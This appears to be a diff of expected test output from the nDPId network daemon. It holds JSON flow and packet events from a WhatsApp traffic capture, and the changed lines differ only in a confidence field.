-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":593,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655101503188,"flow_last_seen":1655101503710,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":323,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1655108978075,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47296,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":588,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655108977493,"flow_last_seen":1655108977793,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655108977793,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37404,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":593,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655101503188,"flow_last_seen":1655101503710,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":323,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1655108978075,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47296,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":593,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":593,"packets-processed":592,"total-skipped-flows":0,"total-l4-payload-len":44070,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":75,"total-detection-updates":0,"total-updates":0,"current-active-flows":8,"total-active-flows":75,"total-idle-flows":67,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":498,"global_ts_msec":1655109656108} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":593,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655109656108,"flow_last_seen":1655109656108,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655109656108,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47776,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":593,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1655109656108,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655109656108,"pkt":"eJS0JASgYDjgxTWgCABFAAA8kRFAAD8GcTDAqAJkszzDMbqgFGZw+MTeAAAAAKAC\/\/+uLgAAAgQFtAQCCArIDZNpAAAAAAEDAwk="} 
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":594,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":1655109656138,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655109656138,"pkt":"eJS0JASgYDjgxTWgCABFAAA0kRJAAD8GcTfAqAJkszzDMbqgFGZw+MTfqcWd3IAQAKwWxQAAAQEICsgNk4cgPV1+"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":595,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":3,"flow_last_seen":1655109656145,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655109656145,"pkt":"eJS0JASgYDjgxTWgCABFAAA4kRNAAD8GcTLAqAJkszzDMbqgFGZw+MTfqcWd3IAYAKzRawAAAQEICsgNk48gPV1+RUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":596,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655109656108,"flow_last_seen":1655109656174,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655109656174,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47776,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":596,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655109656108,"flow_last_seen":1655109656174,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655109656174,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47776,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":601,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":601,"packets-processed":600,"total-skipped-flows":0,"total-l4-payload-len":44353,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":76,"total-detection-updates":0,"total-updates":0,"current-active-flows":9,"total-active-flows":76,"total-idle-flows":67,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":504,"global_ts_msec":1655110961423} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":601,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655110961423,"flow_last_seen":1655110961423,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655110961423,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37766,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":601,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1655110961423,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655110961423,"pkt":"eJS0JASgYDjgxTWgCABFAAA8fpBAAD8Gg7HAqAJkszzDMZOGFGbaRgeTAAAAAKAC\/\/9KQgAAAgQFtAQCCAo4pQHWAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":602,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":1655110961452,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655110961452,"pkt":"eJS0JASgYDjgxTWgCABFAAA0fpFAAD8Gg7jAqAJkszzDMZOGFGbaRgeUJF2xy4AQAIA9NgAAAQEICjilAfPDMqHR"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":603,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":3,"flow_last_seen":1655110962269,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655110962269,"pkt":"eJS0JASgYDjgxTWgCABFAAA4fpJAAD8Gg7PAqAJkszzDMZOGFGbaRgeUJF2xy4AYAID0swAAAQEICjilBSTDMqHRRUQAAQ=="} 
-00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":604,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655110961423,"flow_last_seen":1655110962300,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1655110962300,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37766,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":604,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655110961423,"flow_last_seen":1655110962300,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1655110962300,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37766,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":609,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655111268965,"flow_last_seen":1655111268965,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655111268965,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37674,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":609,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1655111268965,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655111268965,"pkt":"eJS0JASgYDjgxTWgCABFAAA8EatAAD8G8JbAqAJkszzDMZMqFGZD+lK5AAAAAKAC\/\/8O2QAAAgQFtAQCCApKc3b0AAAAAAEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":610,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":2,"flow_last_seen":1655111268994,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655111268994,"pkt":"eJS0JASgYDjgxTWgCABFAAA0EaxAAD8G8J3AqAJkszzDMZMqFGZD+lK6LP1J\/oAQAVcnzwAAAQEICkpzdxL1CahM"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":611,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":3,"flow_last_seen":1655111269269,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655111269269,"pkt":"eJS0JASgYDjgxTWgCABFAAA4Ea1AAD8G8JjAqAJkszzDMZMqFGZD+lK6LP1J\/oAYAVfhawAAAQEICkpzeCT1CahMRUQAAQ=="} 
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":612,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655111268965,"flow_last_seen":1655111269298,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655111269298,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37674,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":612,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655111268965,"flow_last_seen":1655111269298,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655111269298,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37674,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":617,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":617,"packets-processed":616,"total-skipped-flows":0,"total-l4-payload-len":44964,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":78,"total-detection-updates":0,"total-updates":0,"current-active-flows":11,"total-active-flows":78,"total-idle-flows":67,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":515,"global_ts_msec":1655111789393} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":617,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655111789393,"flow_last_seen":1655111789393,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655111789393,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47810,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":617,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1655111789393,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655111789393,"pkt":"eJS0JASgYDjgxTWgCABFAAA8zPVAAD8GNUzAqAJkszzDMbrCFGZ1lRVTAAAAAKAC\/\/8y6QAAAgQFtAQCCArIErl2AAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":2,"flow_last_seen":1655111789426,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655111789426,"pkt":"eJS0JASgYDjgxTWgCABFAAA0zPZAAD8GNVPAqAJkszzDMbrCFGZ1lRVUyQX5N4AQAKyN9wAAAQEICsgSuZfNwELk"} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":619,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":3,"flow_last_seen":1655111789520,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655111789520,"pkt":"eJS0JASgYDjgxTWgCABFAAA4zPdAAD8GNU7AqAJkszzDMbrCFGZ1lRVUyQX5N4AYAKxISAAAAQEICsgSufXNwELkRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":620,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655111789393,"flow_last_seen":1655111789552,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655111789552,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47810,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":624,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655104186658,"flow_last_seen":1655104187274,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655111789765,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47900,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":620,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655111789393,"flow_last_seen":1655111789552,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655111789552,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47810,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":624,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655104186658,"flow_last_seen":1655104187274,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655111789765,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47900,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":624,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655111826253,"flow_last_seen":1655111826253,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655111826253,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46394,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":624,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1655111826253,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655111826253,"pkt":"eJS0JASgYDjgxTWgCABFAAA8UhNAAD8GsD7AqAJkszzDIbU6FGZjXyJuAAAAAKAC\/\/8VRAAAAgQFtAQCCAoGi6NWAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":625,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":1655111826283,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655111826283,"pkt":"eJS0JASgYDjgxTWgCABFAAA0UhRAAD8GsEXAqAJkszzDIbU6FGZjXyJv3hHXrIAQAKwMuwAAAQEICgaLo3SOAvK7"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":626,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":3,"flow_last_seen":1655111826284,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655111826284,"pkt":"eJS0JASgYDjgxTWgCABFAAA4UhVAAD8GsEDAqAJkszzDIbU6FGZjXyJv3hHXrIAYAKzHZwAAAQEICgaLo3aOAvK7RUQAAQ=="} 
-00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":627,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655111826253,"flow_last_seen":1655111826285,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655111826285,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46394,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":627,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655111826253,"flow_last_seen":1655111826285,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655111826285,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46394,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":632,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655111980061,"flow_last_seen":1655111980061,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655111980061,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37822,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":632,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1655111980061,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655111980061,"pkt":"eJS0JASgYDjgxTWgCABFAAA8q99AAD8GVmLAqAJkszzDMZO+FGb1swWwAAAAAKAC\/\/8QqwAAAgQFtAQCCAo4qiGmAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":633,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1655111980164,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655111980164,"pkt":"eJS0JASgYDjgxTWgCABFAAA0q+BAAD8GVmnAqAJkszzDMZO+FGb1swWxsMz8dIAQAICfhAAAAQEICjiqIhkXwNnv"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":634,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":3,"flow_last_seen":1655111980338,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655111980338,"pkt":"eJS0JASgYDjgxTWgCABFAAA4q+FAAD8GVmTAqAJkszzDMZO+FGb1swWxsMz8dIAYAIBZhQAAAQEICjiqIscXwNnvRUQAAQ=="} 
-00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":635,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655111980061,"flow_last_seen":1655111980422,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1655111980422,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37822,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":635,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655111980061,"flow_last_seen":1655111980422,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1655111980422,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37822,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":640,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655111980926,"flow_last_seen":1655111980926,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655111980926,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46576,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
